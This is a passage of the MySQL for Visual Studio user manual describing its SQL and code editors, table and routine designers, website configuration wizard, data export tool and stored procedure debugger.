4. In the **SSL** tab, add a path to the SSL CA, SSL CERT, and SSL Key files within the SSL PEM area. Click **Test Connection** to verify the connection information. The next figure shows an example of SSL PEM values within this tab.
5. Click **OK** to save the connection and return to the **MySQL Connections Manager** window.
**Note**
You must close and then reopen **MySQL Connections Manager** to apply the default schema.
6. Double-click the new SSL connection to add it to Server Explorer (or select the connection and click **OK**). To open the JavaScript or Python code editor, right-click the connection in Server Explorer and then select an editor.
Making edits in MySQL for Visual Studio.
After you have established a connection, for example, using the Connect to MySQL toolbar button, you can use auto-completion as you type or by pressing Control + J. Depending on the context, the auto-completion dialog can show the list of available tables, table columns, or stored procedures (with the signature of the routine as a tooltip). Typing some characters before pressing Control + J filters the choices to those items starting with that prefix.
5.1 MySQL SQL Editor
The MySQL SQL Editor can be opened from the MySQL toolbar or by clicking File, New, and File from the Visual Studio main menu. This action displays the New File dialog.
Figure 5.1 MySQL SQL Editor - New File
From the **New File** dialog, select the MySQL template, select the **MySQL Script** document, and then click **Open**.
The MySQL SQL Editor will be displayed. You can now enter SQL code as required, or connect to a MySQL server. Click the **Connect to MySQL** button in the MySQL SQL Editor toolbar. You can enter the connection details into the **Connect to MySQL** dialog that is displayed. You can enter the server name, user ID, password and database to connect to, or click the **Advanced** button to select other connection string options. Click the **Connect** button to connect to the MySQL server. To execute your SQL code against the server, click the **Run SQL** button on the toolbar.
**Figure 5.2 MySQL SQL Editor - Query**
The results from queries are displayed in the **Results** tab and relevant information appears in the **MySQL Output** pane. The previous example displays the query results within a Result Grid. You can also select the Field Types, Execution Plan, and Query Stats for an executed query.
### 5.2 Code Editors
This section explains how to make use of the code editors in MySQL for Visual Studio.
**Introduction**
MySQL for Visual Studio provides access to MySQL objects and data without forcing developers to leave Visual Studio. Designed and developed as a Visual Studio package, MySQL for Visual Studio integrates...
Getting Started
directly into Server Explorer providing a seamless experience for setting up new connections and working with database objects.
The following MySQL for Visual Studio features are available as of version 2.0.2:
- JavaScript and Python code editors, where scripts in those languages can be executed to query data from a MySQL database.
- Better integration with the Server Explorer to open MySQL, JavaScript, and Python editors directly from a connected MySQL instance.
- A newer user interface for displaying query results, where different views are presented from result sets returned by a MySQL server like:
- Multiple tabs for each result set returned by an executed query.
- Results view, where the information can be seen in grid, tree, or text representation for JSON results.
- Field types view, where information about the columns of a result set is shown, such as names, data types, character sets, and more.
- Query statistics view, displaying information about the executed query such as execution times, processed rows, index and temporary tables usage, and more.
- Execution plan view, displaying an explanation of the query execution done internally by the MySQL server.
Getting Started
The minimum requirements are:
- MySQL for Visual Studio 2.0.5
- Visual Studio 2012
- MySQL 5.7.12 with X Plugin enabled (Code editors are not supported for use with MySQL 8.0 servers.)
To enable X Plugin for MySQL 5.7:
1. Open a command prompt and navigate to the folder with your MySQL binaries.
2. Invoke the `mysql` command-line client:
```
mysql -u user -p
```
3. Execute the following statement:
```
mysql> INSTALL PLUGIN mysqlx SONAME 'mysqlx.dll';
```
Important
The `mysql.session` user must exist before you can load X Plugin. `mysql.session` was added in MySQL 5.7.19. If your data dictionary was initialized using an earlier version you must run the `mysql_upgrade` procedure. If the upgrade is not run, X Plugin fails to start with the following error message:
Opening a Code Editor
There was an error when trying to access the server with user: mysql.session@localhost. Make sure the user is present in the server and that mysql_upgrade was ran after a server update.
Opening a Code Editor
Before opening a code editor that can run scripts against a MySQL server, a connection needs to be established:
1. Open the Server Explorer pane by clicking View.
2. Right-click the Data Connections node and select Add Connection.
3. In the Add Connection window, make sure the MySQL Data Provider is being used and fill in all the information.
Note
To enter the port number, click Advanced and set the Port among the list of connection properties.
4. Click Test Connection to ensure you have a valid connection, then click OK. The new connection with its tables, views, stored procedures, and functions now appears within the Data Connections list of Server Explorer.
5. Right-click the connection, select New MySQL Script, and then select the language of the editor (JavaScript or Python) to open a new MySQL script tab in Visual Studio.
To create a new editor for existing MySQL connections, you need only to do the last step.
Using the Code Editor
An open editor includes a toolbar with the actions that can be executed. The first two buttons in the toolbar represent a way to connect or disconnect from a MySQL server. If the editor was opened from the Server Explorer, the connection will be already established for the new script tab.
The third button is the Run button, the script contained in the editor window is executed by clicking it and results from the script execution are displayed in the lower area of the script tab.
5.3 Editing Tables
MySQL for Visual Studio contains a table editor, which enables the visual creation and modification of tables.
The Table Designer can be accessed through a mouse action on table-type node of Server Explorer. To create a new table, right-click the Tables node (under the connection node) and choose Create Table from the context-menu.
To modify an existing table, double-click the node of the table to modify, or right-click this node and choose the Design item from the context menu. Either of the commands opens the Table Designer.
Table Designer consists of the following parts:
- **Columns Editor** - a data grid on top of the Table Designer. Use the Columns grid for column creation, modification, and deletion. For additional information, see Section 5.3.1, “Column Editor”.
- **Indexes/Keys** window - a window opened from the Table Designer menu to manage indexes.
- **Relationships** window - a window opened from the Table Designer menu to manage foreign keys.
- **Column Properties** panel - a panel near the bottom of the Table Designer. Use the Column Properties panel to set advanced column options.
• **Properties** window - a standard Visual Studio Properties window, where the properties of the edited table are displayed. Use the Properties window to set the table properties. To open, right-click on a table and select the **Properties** context-menu item.
Each of these areas is discussed in more detail in subsequent sections.
To save changes you have made in the Table Designer, press either **Save** or **Save All** on the Visual Studio main toolbar, or press **Control + S**. If you have not already named the table, you will be prompted to do so.
**Figure 5.4 Choose Table Name**

After the table is created, you can view it in the **Server Explorer**.
**Figure 5.5 Newly Created Table**

The Table Designer main menu lets you set a primary key column, edit relationships such as foreign keys, and create indexes.
**Figure 5.6 Table Designer Main Menu**

### 5.3.1 Column Editor
You can use the Column Editor to set or change the name, data type, default value, and other properties of a table column. To set the focus to a needed cell of a grid, use the mouse click. Also you can move through the grid using **Tab** and **Shift + Tab** keys.
To set or change the name, data type, default value and comment of a column, activate the appropriate cell and type the desired value.
To set or unset flag-type column properties (NOT NULL, auto incremented, flags), select or deselect the corresponding check boxes. Note that the set of column flags depends on its data type.
To reorder columns, index columns or foreign key columns in the Column Editor, select the whole column to reorder by clicking the selector column on the left of the column grid. Then move the column by using Control+Up (to move the column up) or Control+Down (to move the column down) keys.
To delete a column, select it by clicking the selector column on the left of the column grid, then press the Delete button on a keyboard.
5.3.2 Column Properties
The Column Properties tab can be used to set column options. In addition to the general column properties presented in the Column Editor, in the Column Properties tab you can set additional properties such as Character Set, Collation and Precision.
5.3.3 Table Properties
To bring up Table Properties select the table and right-click to activate the context menu. Select Properties. The Table Properties dockable window will be displayed.
The following table properties are listed under table properties, and many are fully described in the SHOW TABLE STATUS MySQL documentation.
- **Auto Increment**: The next AUTO_INCREMENT value.
- **Average Row Length**: The AVG_ROW_LENGTH value.
- **Character Set**: The Charset value.
- **Collation**: The Collation value.
- **Comment**: Table comments.
- **Data Directory**: The directory used to store data files for this table.
- **Index Directory**: The directory used to store index files for this table.
- **Maximum Rows**: Value of the MAX_ROWS property.
- **Minimum Rows**: Value of the MIN_ROWS property.
- **Name**: Name of the table.
• **Row Format**: The `ROW_FORMAT` value.
• **Schema**: The schema this table belongs to.
• **Storage Engine**.
**Note**
In MySQL 5.5 and higher, the default storage engine for new tables is **InnoDB**. See *Introduction to InnoDB* for more information about the choice of storage engine, and considerations when converting existing tables to **InnoDB**.
The property **Schema** is read-only.
**Figure 5.9 Table Properties**
### 5.4 Editing Views
To create a new view, right-click the Views node under the connection node in Server Explorer. From the node's context menu, choose the **Create View** command. This command opens the SQL Editor.
You can then enter the SQL for your view, and then execute the statement.
To modify an existing view, double-click a node of the view to modify, or right-click this node and choose the Alter View command from a context menu. Either of the commands opens the SQL Editor.
All other view properties can be set in the Properties window. These properties are:
- **Catalog**: The TABLE_CATALOG.
- **Check Option**: Whether or not the WITH CHECK OPTION clause is present. For additional information, see The View WITH CHECK OPTION Clause.
- **Definer**: Creator of the object.
- **Definition**: Definition of the view.
- **Is Updatable**: Whether or not the view is Updatable. For additional information, see Updatable and Insertable Views.
- **Name**: The name of the view.
- **Schema**: The schema which owns the view.
- **Security Type**: The SQL SECURITY value. For additional information, see Access Control for Stored Programs and Views.
Some of these properties can have arbitrary text values, others accept values from a predefined set. In the latter case, set the desired value with an embedded combobox.
The properties *Is Updatable* and *Schema* are read-only.
To save changes you have made, use either *Save* or *Save All* buttons of the Visual Studio main toolbar, or press *Control + S*.
**Figure 5.11 View SQL Saved**

---
### 5.5 Editing Indexes
Indexes management is performed using the *Indexes/Keys* dialog.
To add an index, select *Table Designer, Indexes/Keys...* from the main menu, and click *Add* to add a new index. You can then set the index name, index kind, index type, and a set of index columns.
5.6 Editing Foreign Keys
You manage foreign keys for InnoDB tables using the Foreign Key Relationships dialog.
To add a foreign key, select Table Designer, Relationships... from the main menu. This displays the Foreign Key Relationship dialog. Click Add. You can then set the foreign key name, referenced table name, foreign key columns, and actions upon update and delete.
To remove a foreign key, select it in the list box on the left, and click the Delete button.
To change foreign key settings, select the required foreign key in the list box on the left. The detailed information about the foreign key is displayed in the right hand panel. Change the desired values.
5.7 Editing Stored Procedures and Functions
To create a new stored procedure, right-click the Stored Procedures node under the connection node in Server Explorer. From the node's context menu, choose the Create Routine command. This command opens the SQL Editor.
Figure 5.14 Edit Stored Procedure SQL
To create a new stored function, right-click the **Functions** node under the connection node in Server Explorer. From the node's context menu, choose the **Create Routine** command.
To modify an existing stored routine (procedure or function), double-click the node of the routine to modify, or right-click this node and choose the **Alter Routine** command from the context menu. Either of the commands opens the SQL Editor.
Routine properties can be viewed in the **Properties** window. These properties are:
- Body
- Catalog
- Comment
- Creation Time
- Data Access
- Definer
- Definition
- External Name
- External Language
- Is Deterministic
- Last Modified
- Name
- Parameter Style
- Returns
- Schema
- Security Type
- Specific Name
- SQL Mode
- SQL Path
- Type
Some of these properties can have arbitrary text values, others accept values from a predefined set. In both cases, these values cannot be set from the properties panel.
You can also set all the options directly in the SQL Editor, using the standard `CREATE PROCEDURE` or `CREATE FUNCTION` statement.
To save changes you have made, use either **Save** or **Save All** buttons of the Visual Studio main toolbar, or press **Control + S**.
5.8 Editing Triggers
To create a new trigger, right-click the node of the table in which to add the trigger. From the node's context menu, choose the Create Trigger command. This command opens the SQL Editor.
To modify an existing trigger, double-click the node of the trigger to modify, or right-click this node and choose the Alter Trigger command from the context menu. Either of the commands opens the SQL Editor.
To create or alter the trigger definition using SQL Editor, type the trigger statement in the SQL Editor using standard SQL.
Note
Enter only the trigger statement, that is, the part of the CREATE TRIGGER query that is placed after the FOR EACH ROW clause.
All other trigger properties are set in the Properties window. These properties are:
- Definer
- Event Manipulation
- Name
• Timing
Some of these properties can have arbitrary text values, others accept values from a predefined set. In the latter case, set the desired value using the embedded combo box.
The properties **Event Table**, **Schema**, and **Server** in the Properties window are read-only.
To save changes you have made, use either **Save** or **Save All** buttons of the Visual Studio main toolbar, or press **Control + S**. Before changes are saved, you will be asked to confirm the execution of the corresponding SQL query in a confirmation dialog.
To observe the runtime behavior of a stored routine and debug any problems, use the Stored Procedure Debugger. For additional information, see Chapter 11, *Debugging Stored Procedures and Functions*.
Chapter 6 MySQL Website Configuration Tool
This MySQL for Visual Studio feature enables you to configure the Membership, Role, feature enables you to configure the Entity Framework, Membership, Role, Site Map, Personalization, Session State, and Profile Provider options without editing the configuration files. You set your configuration options within the tool, and the tool modifies your web.config file accordingly.
Note
Site Map and Personalization provider support requires MySQL Connector.NET 6.9.2 or higher and MySQL for Visual Studio 1.2.1 or higher.
The MySQL Website Configuration Tool appears as a small icon on the Solution Explorer toolbar in Visual Studio, as shown in the following figure.
Figure 6.1 MySQL Website Configuration Tool
Note
The MySQL Website Configuration Tool icon is only visible if a MySQL project is active and if Connector.NET is installed.
Clicking the Website Configuration Tool icon launches the wizard and displays the first step (Entity Framework), as the figure that follows shows.
Figure 6.2 MySQL Website Configuration Tool - Entity Framework
This allows you to configure your application to use Entity Framework 5 or 6 with MySQL as the database provider, adding the required references to the project and updating the configuration file accordingly.
Figure 6.3 MySQL Website Configuration Tool - Membership
By clicking next, the next screen will allow you to enable a MySQL Membership Provider. In addition to the standard (advanced) "Membership" provider, there is also a "Simple Membership" provider. You can only choose one of these two membership providers.
Advanced Membership Provider
To use the more advanced "Membership" provider, select the "Use MySQL to manage my membership records" check box to enable this. You can now enter the name of the application that you are creating the configuration for. You can also enter a description for the application.
You can then click the **Edit...** button to launch the Connection String Editor:
**Figure 6.4 MySQL Website Configuration Tool - Connection String Editor**
Note
Defined connection strings are automatically loaded and available in this dialog, whether they were created manually in *web.config* or previously using this tool.
You can also ensure that the necessary schemas are created automatically for you by selecting the **Autogenerate Schema** check box. These schemas are used to store membership information. The database used to storage is the one specified in the connection string.
You can also ensure that exceptions generated by the application will be written to the Windows event log by selecting the **Write exceptions to event log** check box.
Clicking the **Advanced** button launches a dialog that enables you to set Membership Options. These options dictate such variables as password length required when a user signs up, whether the password is encrypted and whether the user can reset their password or not.
The "Simple Membership" provider is similar to the advanced version, but it includes less options. To enable, check the "Use MySQL to manage my simple membership records" check box.
**Note**
The "Simple Membership" option was added in MySQL for Visual Studio version 1.2.3.
Figure 6.6 MySQL Website Configuration Tool - Simple Membership
The MySQL Simple Membership provider handles the website membership tasks with ASP.NET. This provider is a simpler version of the ASP.NET Membership provider, and it can also work with OAuth Authentication. For additional information about using OAuth authentication, see Adding OAuth Authentication to a Project.
The required configuration options for the Simple Membership provider are: a name for the connection string, and a connection string that contains a valid database with a local or remote MySQL server instance, a user table to store the credentials, and column names for the User ID and User Name columns.
Check the Auto Create Tables option to create the required tables when adding the first user to the table. After setting up a membership provider, a new section is added to the web configuration file.
After setting up a membership provider, a new section is added to the web configuration file.
After setting up one of the membership providers, click **Next** to configure the Roles Provider:
Figure 6.8 MySQL Website Configuration Tool - Roles
Again the connection string can be edited, a description added and Autogenerate Schema can be enabled before clicking **Next** to go to the Profiles Provider screen:
Figure 6.9 MySQL Website Configuration Tool - Profiles
This screen display similar options to the previous screens.
Click **Next** to proceed to the Session State configuration page:
Figure 6.10 MySQL Website Configuration Tool - Session State
Click **Next** to proceed to the Site Map configuration page:
The Site Map provider builds a site map from a MySQL database, and builds a complete tree of the `SitemapNode` objects. It also provides methods so that the generated nodes can be read from the site map.
The required configuration options: A name for the connection string, and a connection string that contains a valid database with a local or remote MySQL server instance.
After setting up the Site Map provider, a new section is added to the web configuration file.
Click **Next** to proceed to the Web Personalization configuration page:
The Web Personalization provider is used when a website application needs to store persistent information for the content and layout of the Web Parts pages that are generated by a Web Parts personalization service. This provider should be used along with the Membership, Roles, and Profiles providers.
The required configuration options: A name for the connection string, and a connection string that contains a valid database with a local or remote MySQL server instance.
After setting up the Personalization provider, a new section is added to the web configuration file.
Once you have set up the optional Web Personalization options, click Finish to exit the wizard.
At this point, select the **Authentication Type** to **From Internet**. Launch the **WEBSITE, ASP.NET Configuration** tool and select the **Security** tab. Click the **Select authentication type** link and ensure that the **From the internet** radio button is selected. You can now examine the database you created to store membership information. All the necessary tables will have been created for you:
**Figure 6.15 MySQL Website Configuration Tool - Tables**
Chapter 7 MySQL Project Items
Table of Contents
7.1 Minimum Requirements ................................................................. 45
7.2 MySQL ASP.NET MVC Items ......................................................... 45
7.3 MySQL Windows Forms Items ....................................................... 54
This tutorial uses MySQL MVC Item templates to set up a MVC web application. At the end of the tutorial a Windows Forms Item with MySQL connectivity will also be created.
7.1 Minimum Requirements
• MySQL 5.5 installed on a host that is accessible.
• MySQL for Visual Studio 1.2.5.
• Visual Studio 2012, the professional edition.
• MySQL Connector/.NET is required to use web providers in the generated web application.
7.2 MySQL ASP.NET MVC Items
To add a MySQL MVC Item to an existing MVC project, first add a MySQL Entity Framework model. Skip this step if you have already done this.
Configure the project to use MySQL with an Entity Framework. There are two ways to do this:
• Manually add the references needed (EntityFramework, MySql.Data &MySql.Data.Entity), and add the required configuration to the web.config configuration file
• Or (preferred), take advantage of the MySQL Website Configuration tool, which allows either Entity Framework 5 or 6 with MySQL. For additional information about this tool, see Chapter 6, MySQL Website Configuration Tool.
Once you have configured the project to use MySQL with Entity Framework, proceed to create the model using the standard ADO.NET Entity Data Model wizard. For MySQL MVC Item Templates, you need to add the model under the “Models” folder, as illustrated below:
Figure 7.1 ADO.NET Entity Data Model
Choose Model Contents
What should the model contain?
Create model
Empty model
Creates an entity model from a database. Object-layer code is generated from the model. This option also lets you specify the database connection, settings for the model, and database objects to include in the model.
Figure 7.2 Choose or create a new MySQL connection
Figure 7.3 Creating a new MySQL connection
After selecting the MySQL connection, you need to select the database objects to include in the model.
**Important**
The **Pluralize or singularize generated object names** option must remain unchecked, otherwise the MySQL MVC Item Template will not function properly.
Figure 7.4 Selecting the database object to include in the model
Click **Finish** to generate the model, as demonstrated below:
Now, generate a new MySQL MVC Item. Right-click on the project, and select Add New Item from the contextual menu.
This launches the Add New Item wizard. The MySQL menu offers two options: MySQL New MVC Item and MySQL New Windows Form. Select MySQL New MVC Item, and then click Add.
This opens the **MVC Item Template** dialog. Now select the MySQL model and entity that you want to use to create the MVC item. The model dropdown list is populated based on all the MySQL Entity Framework models available in the project, entities dropdown list is populated with entities available for the selected model.
After selecting the model and entity to create the item, click **Finish**, and a new controller and view matching the selected entity will be added to the project. These contain the necessary back end code to render the *entity* data.
You can now execute the application. In our example we used the Sakila database and generated an Actor controller:
**Figure 7.11 The Actor View**
<table>
<thead>
<tr>
<th>Actor List</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>actor_id</strong></td>
</tr>
<tr>
<td>1</td>
</tr>
<tr>
<td>2</td>
</tr>
<tr>
<td>3</td>
</tr>
<tr>
<td>4</td>
</tr>
<tr>
<td>5</td>
</tr>
<tr>
<td>6</td>
</tr>
<tr>
<td>7</td>
</tr>
<tr>
<td>8</td>
</tr>
<tr>
<td>9</td>
</tr>
<tr>
<td>10</td>
</tr>
</tbody>
</table>
© 2015 - My ASP.NET Application
7.3 MySQL Windows Forms Items
Figure 7.12 MySQL New Windows Form
The procedure to add a MySQL Windows Forms Item is basically similar to adding a MySQL MVC Item, with three major differences:
- You can create the MySQL Entity Framework model under the root path of the project.
- When selecting the desired entity, you can also select the layout type in which the new form will display the entity data.
Figure 7.14 The "MySQL Windows Form" Item Template dialog, with the layout options
- A Resources folder is added to the project that contains images used by the icons for the generated form.
Figure 7.15 The Resources Folder and New Form
The new form will have all the necessary back-end code to display the entity data, with the user interface (UI) based on the previously selected layout.
Figure 7.16 The "frmactor" Form in Design Mode
Figure 7.17 The "frmactor" Form to Display Data
Chapter 8 MySQL Data Export Tool
MySQL for Visual Studio has a data export tool that creates a dump file for a MySQL database.
Figure 8.1 MySQL for Visual Studio Data Export Tool: Main Window
Creating a Dump of an existing MySQL Database
In order to open a new window for the MySQL Data Export tool, the user must create a new connection using the Server Explorer Window inside Visual Studio. Once the connection is established, a contextual menu can be opened by right clicking on the connection node. From the menu, choose the MySQL Data Export option. A new tabbed-window opens for the current connection. The user can select one or more databases to include in the dump.
Follow these steps to create a dump for the MySQL Databases:
1. Select all the databases and their objects to be included in the dump.
2. It is very important to select the desired settings for the dump: whether the dump will include the data, whether the insert operations will be logged in extended mode, and so on. In the main window of the MySQL Database Export tool are shown the basic options for the dump. Also, by clicking on the Advanced button, more specific options can also be selected.
3. When the selection of the options is done, give a name to the result file that will be created. If no path is given for the result file, the default path to be used is **My Documents** under the user's folder.
4. A filter can be applied on the list of schemas for the selected connection. With it, the user can easily locate the databases to be included in the dump.
Figure 8.6 MySQL for Visual Studio Data Export Tool: Filtering the Schemas
5. After selecting the options and the name for the dump file, the user can click the Export button, which generates the dump.
Each dump can have different settings. After configuring the dump operation, the settings can be saved into a setting file for later use. This file includes: the connection selected, the name of the file for the dump, and the database or databases and the objects selected for dumping. The file extension for the setting file is `.dumps`.
Figure 8.8 MySQL for Visual Studio Data Export Tool: Saving a Setting File
A saved setting file can be loaded into the MySQL Data Export tool by clicking the Load Settings button.
Figure 8.9 MySQL for Visual Studio Data Export Tool: Opening a Setting File
Chapter 9 Using the ADO.NET Entity Framework
ADO.NET Entity Framework provides an Object Relational Mapping (ORM) service, mapping the relational database schema to objects. The ADO.NET Entity Framework defines several layers, these can be summarized as:
- **Logical** - this layer defines the relational data and is defined by the Store Schema Definition Language (SSDL).
- **Conceptual** - this layer defines the .NET classes and is defined by the Conceptual Schema Definition Language (CSDL)
- **Mapping** - this layer defines the mapping from .NET classes to relational tables and associations, and is defined by Mapping Specification Language (MSL).
MySQL Connector/.NET integrates with Visual Studio to provide a range of helpful tools to assist development.
A full treatment of ADO.NET Entity Framework is beyond the scope of this manual. If you are unfamiliar with ADO.NET, review the Microsoft ADO.NET Entity Framework documentation.
Tutorials on getting started with ADO.NET Entity Framework are available. See Tutorial: Using an Entity Framework Entity as a Windows Forms Data Source and Tutorial: Data Binding in ASP.NET Using LINQ on Entities.
Chapter 10 DDL T4 Template Macro
Convert an Entity Framework model to MySQL DDL code. Starting with a blank model, you can develop an entity model in Visual Studio's designer. Once the model is created, you can select the model's properties, and in the Database Script Generation category of the model's properties, the property DDL Generation can be found. Select the value SSDLToMySQL.tt(VS) from the drop-down list.
Figure 10.1 DDL T4 Template Macro - Model Properties
Right-clicking the model design area displays a context-sensitive menu. Selecting Generate Database from Model from the menu displays the Generate Database Wizard. The wizard can then be used to generate MySQL DDL code.
Figure 10.2 DDL T4 Template Macro - Generate Database Wizard
Chapter 11 Debugging Stored Procedures and Functions
The stored procedure debugger provides facilities for setting breakpoints, stepping into individual statements (Step Into, Step Out, Step Over), evaluating and changing local variable values, evaluating breakpoints, and other debugging tasks.
Privileges
The debugger recreates at the start of each debug session a serversidedebugger database in your server. This database helps to track the instrumented code and implement observability logic in the debugged routine. Your current connection needs to have privileges to create that database, and its associated stored routines, functions, and tables.
The debugger makes changes behind the scenes to temporarily add instrumentation code to the stored routines that you debug. You must have the ALTER ROUTINE privilege for each stored procedure, function, or trigger that you debug. (Including procedures and functions that are called, and triggers that are fired, by a procedure that you are debugging.)
Starting the Debugger
To start the debugger, follow these steps:
2. Expand the Stored Procedures folder. Only stored procedures can be debugged directly. To debug a user-defined function, create a stored procedure that calls the function.
3. Click on a stored procedure node, then right-click and from the context menu choose Debug Routine.
Figure 11.1 Choose a Stored Routine to Debug
Usage
At this point, Visual Studio switches to debug mode, opening the source code of the routine being debugged in step mode, positioned on the first statement.
If the initial routine you debug has one or more arguments, a pop-up will show up with a grid (a row per each argument and three columns: one for the argument, one for the argument value (this is editable) and one for nullifying that argument value (a checkbox). After setting up all the argument values, you can press OK to start the debug session, or Cancel to cancel the debug session.
Figure 11.2 Setting Arguments (1 of 2)
How the Debugger Functions
To have visibility into the internal workings of a stored routine, the debugger prepares a special version of the procedure, function, or trigger being debugged, instrumented with extra code to keep track of the current line being stepped into and the values of all the local variables. Any other stored procedures, functions, or triggers called from the routine being debugged are instrumented the same way. The debug versions of the routines are prepared for you automatically, and when the debug session ends (by either pressing F5 or Shift + F5), the original versions of the routines are automatically restored.
A copy of the original version of each instrumented routine (the version without instrumentation) is stored in the AppData\Roaming\MySqlDebuggerCache folder for the current Windows user (the path returned by calling System.Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) in .NET, plus appending MySqlDebuggerCache. There is one file for each instrumented routine, named routine_name.mysql. For example, in Windows 7, for a user named fergus, the path is C:\Users\fergs\AppData\Roaming\MySqlDebuggerCache.
Two threads are used, one for the debugger and one for the routine being debugged. The threads run in strict alternation, switching between the debugger and the routine as each statement is executed in the stored routine.
Basic Debugging Operations
The debugger has the same look and feel as the standard Visual Studio debuggers for C#, VB.NET or C++. In particular, the following are true:
Locals and Watches
- To show the Locals tab, choose the menu item Debug, Windows, Locals.
The Locals tab lists all the variables available in the current scope: variables defined with DECLARE at any point in the routine, argument parameters, and session variables that are referenced.
- If the last step operation changes the value of a local, its value will be highlighted in red (until another statement is executed or stepped).
- You can change the value of any local.
- To show the Watch tab, choose the menu item Debug, Windows, Watch.
To define a watch, type any valid MySQL expression, optionally including function calls. If the watch evaluation makes sense in the current context (current stack frame), it will show its value, otherwise it will show an error message in the same row the watch was defined.
- When debugging a trigger, in addition to any locals declared or session variables referenced, the new and old object (when applicable) will be listed. For example in a trigger for INSERT, for a table defined like:
```
create table t1( id int, myname varchar( 50 ));
```
the locals will list the extra variables new.id and new.myname. For an UPDATE trigger, you will also get the extra variables old.id and old.myname. These variables from the new and old objects can be manipulated the same way as any ordinary local variable.
Figure 11.4 Debugging a Trigger
Call Stack
- To show the Call Stack tab, choose the menu item Debug, Windows, Call Stack.
- The stack trace (in the Call Stack tab) will list all the stack traces, one for each routine invocation. The one with a yellow mark is the current stepping point. Clicking in another will activate in the editor the tab for that routine source, highlighting in green the last statement stepped.
Figure 11.5 Call Stack
Stepping
- Stepping of a new routine starts in the first executable instruction (excluding declares, handlers, cursor declarations, and so on).
Figure 11.6 Debug Stepping
```sql
CREATE PROCEDURE `spTest` ()
begin
declare n int;
set n = 1;
while n < 5 do
begin
set n = n + 1;
end;
end while;
end
```
Figure 11.7 Function Stepping (1 of 2)
```
CREATE PROCEDURE `SimpleNonScalar`()
begin
update CalcData set z = DoSum( x, y );
end
```
Local Variabes:
- Name
- Value
- Type
Call Stack:
- Name
- Line
SimpleNonScalar
MySQL
• To step into the code of a condition handler, the condition must be triggered in the rest of the MySQL routine.
• The next statement to be executed is highlighted in yellow.
• To continue stepping, you can choose between **Step Into** (by pressing **F11**), **Step Out** (by pressing **F10**) or **Step Over** (by pressing **Shift + F11**).
• You can step out of any of functions, triggers or stored procedures. If you step from the main routine, it will run that routine to completion and finish the debug session.
• You can step over stored procedure calls, stored functions, and triggers. (To step over a trigger, step over the statement that would cause the trigger to fire.)
• When stepping into a single statement, the debugger will step into each individual function invoked by that statement and each trigger fired by that statement. The order in which they are debugged is the same order in which the MySQL server executes them.
• You can step into triggers triggered from **INSERT**, **DELETE**, **UPDATE**, and **REPLACE** statements.
• Also, the number of times you enter into a stored function or trigger depends on how many rows are evaluated by the function or affected by the trigger. For example, if you press **F11 (Step Into)** into an **UPDATE** statement that modifies three rows (calling a function for a column in the **SET** clause, thus invoking the function for each of the three rows), you will step into that function three times in succession, once for each of the rows. You can accelerate this debug session by disabling any
Basic Debugging Operations
breakpoints defined in the given stored function and pressing Shift + F11 to step out. In this example, the order in which the different instances of the stored function are debugged is server-specific: the same order used by the current MySQL server instance to evaluate the three function invocations.
Breakpoints
• To show the Breakpoints tab, choose the menu item Debug, Windows, Breakpoints.
• The Breakpoints tab will show all the breakpoints defined. From here, you can enable and disable breakpoints one by one or all at once (using the toolbar on top of the Breakpoints tab).
• You can define new breakpoints only in the middle of a debug session. Click in the left gray border of any MySQL editor, or click anywhere in a MySQL editor and press F9. In the familiar Visual Studio way, you press F9 once to create a breakpoint in that line, and press it again to remove that breakpoint.
• Once a breakpoint is defined, it will appear enabled (as filled red circle left to the current row if that line is a valid statement to put a breakpoint) or disabled (as a non-filled red circle left to the current row if that row is not valid to put a breakpoint).
• To define conditional breakpoints, after creating the breakpoint, right click in the red dot and choose Condition... There you can put any valid MySQL expression and state if the condition is Is True or Has changed. The former will trigger the breakpoint every time the condition is true, the latter every time the condition value has changed. (If you define a conditional breakpoint, it is not enough to step into the line with the breakpoint defined to trigger such a breakpoint.)
Figure 11.9 Conditional Breakpoints
Figure 11.10 Expressions and Breakpoints
To define pass count breakpoints, after creating the breakpoint, right click in the red dot and choose `Hit Count...`. In the pop-up dialog, define the specific condition to set. For example, `break when the hit count is equal to` and a value 3 will trigger the breakpoint the third time it is hit.
Other Features
- To abort the debug session (and the execution of the current call stack of routines), press `Shift + F5`.
- To run the routine to completion (or until next breakpoint hit), press `F5`.
- For all functionality you can use (in addition to the shortcuts documented), see the options in the `Debug` menu of Visual Studio.
Limitations
- Code being debugged must not use `get_lock` or `release_lock` MySQL functions, since they are used internally by the debugger infrastructure to synchronize the debugger and the debugged routine.
- Code being debugged must avoid using any transaction code (`START TRANSACTION`, `COMMIT`, `ROLLBACK`) due to the possibility of wiping out the contents of the debugger tables. (This limitation may be removed in the future).
- You cannot debug the routines in the `serversidedebugger` database.
- The MySQL server running the routine being debugged can be any MySQL server version after 5.0, and running on any supported platform.
• Always run debug sessions on test and development servers, rather than against a MySQL production server, because debugging can cause temporary performance issues or even deadlocks. The instrumented versions of the routines being debugged use locks that might not pertain to the rest of the production code.
**Keyboard Shortcuts**
The following list summarizes the keyboard shortcuts for debugging:
• **F9** Toggles breakpoints
• **F11**: Step into once
• **F10**: Step over once
• **Shift + F11**: Step out once
• **F5**: Run
• **Shift + F5**: Abort current debug session
Appendix A MySQL for Visual Studio Frequently Asked Questions
Questions
• A.1: How do I know if MySQL for Visual Studio is installed?
Questions and Answers
A.1: How do I know if MySQL for Visual Studio is installed?
Open Visual Studio and go to View, Toolbars, and look for (and enable) the MySQL toolbar. Or, open MySQL Installer and look for the MySQL for Visual Studio product.
|
